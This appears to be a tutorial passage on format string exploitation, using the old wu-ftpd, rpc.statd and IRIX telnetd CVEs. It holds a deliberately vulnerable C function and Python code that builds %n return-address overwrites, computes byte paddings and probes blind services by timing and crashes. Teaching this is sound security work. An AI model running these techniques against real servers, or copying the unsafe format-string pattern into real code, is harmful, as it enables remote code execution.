To make the concepts of format string attacks concrete, let's examine two real-world exploitation scenarios.
Example 1: Stack-based format string (wu-ftpd 2.6.0 style)
The wu-ftpd program is an FTP server, common on many Linux distributions. The wu-ftpd 2.6.0 format string vulnerability, known as CVE-2000-0573, is a critical flaw that allows remote attackers to execute arbitrary code with root privileges. The vulnerability lies in the lreply function, which passes user input to a string formatting function without sanitizing the format specifiers it contains. Because the server treats the user-supplied text as the format string, an attacker can inject format specifiers (%s, %n, %x, etc.) into the command input. We'll examine the principles of this exploit with a slightly simplified example:
#include <stdio.h>

void vulnerable_function(char *user_input) {
    char buffer[512];
    // BUG: user_input is used as the format string itself
    snprintf(buffer, sizeof(buffer), user_input);
    buffer[sizeof(buffer) - 1] = '\0';
    // Return address is on stack
}
Analysis
- The format string is on the stack at a predictable offset.
- It is limited by the buffer size (512 bytes).
- We can reach our own string through stack popping.
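Stack popping can be illustrated with a small helper that scans a probe response for the marker. This is a minimal sketch: it assumes the probe was "AAAA" followed by repeated "%08x." so that every leaked word is a fixed-width, dot-separated field. The function name and the sample response are invented for illustration.

```python
def find_marker_offset(response, marker="41414141"):
    """Return the 1-based index of the leaked word that echoes the marker, or None."""
    # Skip the literal "AAAA" prefix, then split the dot-separated %08x fields
    fields = response[len("AAAA"):].split(".")
    for position, field in enumerate(fields, start=1):
        if field == marker:
            return position
    return None


# Made-up response: the fourth leaked word is our own "AAAA" (0x41414141)
sample = "AAAAbffff5a0.00000200.b7fd1000.41414141.2e783830."
offset = find_marker_offset(sample)
```

Using a fixed-width specifier with a separator avoids the ambiguity of plain %x, whose output has variable length and runs together.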
Exploitation approach
- Find the distance: Test with AAAA%x%x%x%x%x%x and count until we see 41414141. Suppose it's 4 positions (16 bytes) away.
- Identify the target: Use objdump to inspect the binary and a debugger such as gdb to find where the saved return address is stored at run time. Suppose it's at 0xbffff710.
- Construct the exploit:
import struct

# Target: write shellcode address to return address location
retaddr_location = 0xbffff710
shellcode_address = 0xbffff800

# Convert to little-endian bytes
addrs = struct.pack("<I", retaddr_location) + \
        struct.pack("<I", retaddr_location + 1) + \
        struct.pack("<I", retaddr_location + 2) + \
        struct.pack("<I", retaddr_location + 3)

# Stack popping: 4 positions (bytes, so it can be concatenated with addrs)
stackpop = b"%x" * 4

# Calculate padding for each byte of 0xbffff800
# Bytes: 0x00, 0xf8, 0xff, 0xbf (little-endian)
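The padding calculation mentioned in the last comment can be sketched as follows. Each %n stores the number of characters printed so far, so the field width before each write has to bring the low byte of that running count to the desired value. The helper name byte_paddings, the min_width default, and the figure of 64 characters already printed are assumptions for illustration; the real count depends on the address block and on how much output the stack-popping specifiers produce.

```python
import struct


def byte_paddings(value, already_written, min_width=10):
    """Return four %u field widths so that successive %n writes store the
    bytes of `value`, least significant byte first."""
    widths = []
    count = already_written
    for byte in struct.pack("<I", value):
        # Characters still needed so that count % 256 equals the target byte
        pad = (byte - count) % 256
        # A 32-bit %u can print up to 10 digits; a narrower width would not
        # guarantee an exact character count, so wrap around once more
        if pad < min_width:
            pad += 256
        widths.append(pad)
        count += pad
    return widths


# Assumed: 64 characters were printed before the first padded specifier
widths = byte_paddings(0xbffff800, already_written=64)
write_part = "".join(f"%{w}u%n" for w in widths)
```

Note that every %u consumes one stack word, so this layout needs a dummy word in front of each target address in the address block.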
Key challenges
- Null bytes in addresses complicate exploitation. They must be avoided because a null byte indicates an end of string in C.
- The limited buffer size restricts padding options.
- We need precise distance calculation.
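The null-byte constraint is easy to check before sending anything. The sketch below packs the candidate addresses the same way as the exploit code and reports the offsets of any forbidden bytes. The function name bad_byte_positions is hypothetical, and the set of bad bytes is an assumption: a real service may also reject characters such as newlines or spaces.

```python
import struct


def bad_byte_positions(addresses, bad_bytes=b"\x00"):
    """Return the offsets of forbidden bytes in the packed little-endian address block."""
    packed = b"".join(struct.pack("<I", address) for address in addresses)
    return [index for index, byte in enumerate(packed) if byte in bad_bytes]


# The four write targets used above contain no null bytes
clean = bad_byte_positions([0xbffff710 + i for i in range(4)])

# An address ending in 0x00 would terminate the string at its first byte
dirty = bad_byte_positions([0xbffff700])
```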
Example 2: Blind exploitation (no output visible)
The rpc.statd program is a server for remote procedure calls (RPC) that implements the Network Status Monitor (NSM) RPC protocol and is part of the Network File System (NFS) package. The logging code in this server uses the syslog function and passes it user-supplied data as the format string. This bug was registered as CVE-2000-0666.
A malicious user could create a format string that injects executable code and overwrites a function's return address, forcing the program to execute the injected code.
A similar bug existed in the telnetd program on SGI IRIX operating systems. Telnetd is the server to which telnet requests connect. The vulnerability was registered as CVE-2000-0733 and was similar to the rpc.statd bug: the server calls the syslog function to log certain environment variables. An attacker could send a request to set a specific environment variable, and the syslog call used the attacker-controlled input directly as the format string without sanitizing it.
When you cannot see the format function's output (e.g., it logs to syslog or a file you can't read), you can still exploit the vulnerability through side channels such as response timing and crashes:
Technique
- Use %.NNNNNNu with very large N to create delays
- Measure response time to determine if the format string was processed
- Use %n writes to unmapped addresses to cause crashes (distinguishable from normal termination)
- Perform a binary search through the memory space to find valid write targets
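The binary search step can be sketched under a strong simplifying assumption: within the searched range, every page below some boundary is unmapped and every page at or above it is writable (roughly the shape of a stack region). The oracle is_writable is hypothetical; in practice it would send a %n write to the address and report whether the service survived, which also assumes the service restarts after a crash.

```python
PAGE = 0x1000  # assumed page size


def lowest_writable_page(is_writable, lo, hi):
    """Binary search for the lowest writable page.

    lo: page-aligned address known to crash the target.
    hi: page-aligned address known to be writable.
    """
    while hi - lo > PAGE:
        # Pick a page-aligned midpoint strictly between lo and hi
        mid = lo + ((hi - lo) // (2 * PAGE)) * PAGE
        if is_writable(mid):
            hi = mid  # boundary is at or below mid
        else:
            lo = mid  # boundary is above mid
    return hi


# Stand-in oracle for demonstration: pretend the region starts at 0xbffdf000
def demo_oracle(address):
    return address >= 0xbffdf000


boundary = lowest_writable_page(demo_oracle, 0xbf000000, 0xbffff000)
```

Each probe costs one request, so the search needs about log2 of the number of pages in the range rather than one probe per page.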
Example timing-based distance discovery
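import time

def find_distance(target):
    # send_to_target is a placeholder for whatever delivers the string to the service
    for distance in range(1, 100):
        test_string = "AAAA" + "%x" * distance + "%.9999999u"
        start_time = time.time()
        send_to_target(target, test_string)
        elapsed = time.time() - start_time
        # The delay shows the string was processed at this length; on its own
        # it does not prove that the marker sits at this offset
        if elapsed > 2.0:  # Significant delay indicates processing
            return distance
    return None  # No probe produced a measurable delay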
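A fixed threshold such as 2.0 seconds is sensitive to network jitter. One hedged alternative is to compare the probe against a baseline request and use the median of several trials. In the sketch below, send is a caller-supplied function (hypothetical, standing in for the real transport), and the trial count and factor are arbitrary illustrative defaults.

```python
import statistics
import time


def looks_processed(send, probe, baseline, trials=5, factor=3.0):
    """Return True if the probe is consistently slower than the baseline request."""

    def median_time(payload):
        samples = []
        for _ in range(trials):
            start = time.perf_counter()
            send(payload)
            samples.append(time.perf_counter() - start)
        # The median is less affected by a single slow round trip than the mean
        return statistics.median(samples)

    return median_time(probe) > factor * median_time(baseline)
```

A call such as looks_processed(send, "AAAA%.9999999u", "AAAA") would then report whether the large-precision specifier measurably slows the response.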